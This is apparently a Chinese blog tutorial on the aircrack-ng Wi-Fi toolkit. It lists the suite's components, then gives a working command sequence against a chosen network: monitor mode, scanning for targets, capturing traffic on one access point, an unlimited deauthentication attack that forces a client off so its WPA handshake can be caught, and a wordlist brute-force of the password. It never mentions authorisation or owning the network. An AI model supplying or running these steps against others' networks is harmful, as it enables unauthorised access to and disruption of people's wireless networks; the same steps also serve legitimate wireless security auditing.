aircrack-ng wifi网络安全性的工具

阅读数:23 评论数:0

跳转到新版页面

分类

hacker

正文

一、简介

Aircrack-ng是wifi网络安全性的工具,它不仅限于监控和获取能力,还包括破坏网络的能力。

1、主要组件:

(1)aircrack-ng

主要用于WEB及WPA-PSK密码的恢复,只要airodump-ng收集到足够数量的数据包,aircrack-ng就可以自动检测数据并判断是否可以确解。

(2)airmon-ng

用于改变无线网卡工作模式,以便其他工具的顺利使用,会重新创建一个网卡名称。

(3)aireplay-ng

在进行WEP及WPA-PSK密码恢复时,可以根据需要创建特殊的无线网络数据报文及流量。

(4)airodump-ng

用于捕获802.11数据报文,以便于aircrack-ng

(5)airserv-ng

可以将无线网卡连接到某一选定端口。

(6)airolib-ng

进行WPA Rainbow Table攻击时使用,用于创立特定数据库文件 。

(7)airdecap-ng

用于解开处于加密状态的数据包。

 

二、示例

这里使用的rtl8812au芯片的外接网卡。

1、kill掉影响网卡的进程

sudo airmon-ng check kill

一般情况下,每次重启或开机后,这些进程都会自已开始,因些第一次使用都需要kill掉这些进程。

2、把网卡设置为监听模式

#查看要设置网卡是wlan0还是wlan1
iwconfig
sudo ifconfig wlan1 down
sudo iwconfig wlan1 mode monitor
sudo ifconfig wlan1 up
#确认网卡是否进行monitor模式
iwconfig

3、监听附近的网络

sudo airodump-ng wlan1 --band -a
#ctrl+c结束

要记住要破解的信道和BSSID.

(1)PWR

网卡的信号水平,它的数值是驱动决定的,但是离接入点或基站越近,信号数值就会变得越大,对我们来说,越大越好。

(2)Beacons

接入点发出的公告报文 的数量。

(3)Data

捕捉到的数据包的数量。

(4)/s

过去10s每秒收到的数据包的数量。

(5)MB

接入点支持的最大速度。

(6)ENC

表示使用的加密算法,OPN表示没有加密,WEP?表示不确定是WEP还是WPA/WPA2

(7)CIPHER

检测出的密码体系。

(8)AUTH

使用的认证协议,GMT(WPA/WPA2使用单独的认证服务器)、SKA(WEP共享密钥)、PSK(WPA/WPA2预共享密钥)、或者OPN(WEP开放认证)

4、开始抓包

airodump-ng -w newdata --channel 1 wlan1
或者
airodump-ng -w newdata --channel 1 --bssid 2H:A6:8D:82:BC:7A wlan1

-w表示保存握手包,包名可以随意设置。

-channel 1表示指定频道,

--bssid指定无线AP

注意STATION即为连接AP的客户端MAC地址。

5、隐藏 wifi

另外ESSID带有length:xx的就是隐藏的wifi。

6、进行解除认证攻击

 aireplay-ng -0 0 -a C0:00:00:00:00:48 -c 18:00:00:00:00:88 wlan1

-0发起deauthentication攻击,后面的数字为攻击次数,0表示无限攻击。

-c指定强制断开的设备,即上一步的STATION。

-a指定无线路由器BSSID

aireplay-ng可以强制用户断开wifi连接,其原理是给连接到wifi的一个设备发送一个deauth(反认证)包,让那个设备断开wifi,随后它自然会再次连接wifi。

当你获取握手包时,会显示“WPA handshake”。

7、爆破密码

先关闭监听模式,然后。

sudo aircrack-ng -w 密码本 -b bssid newdata.cap

在指定制目录下可以找到形如xxx.cap的握手包,若出现多个握手包,一般使用最后一个,或使用其它工具查看有效的握手包。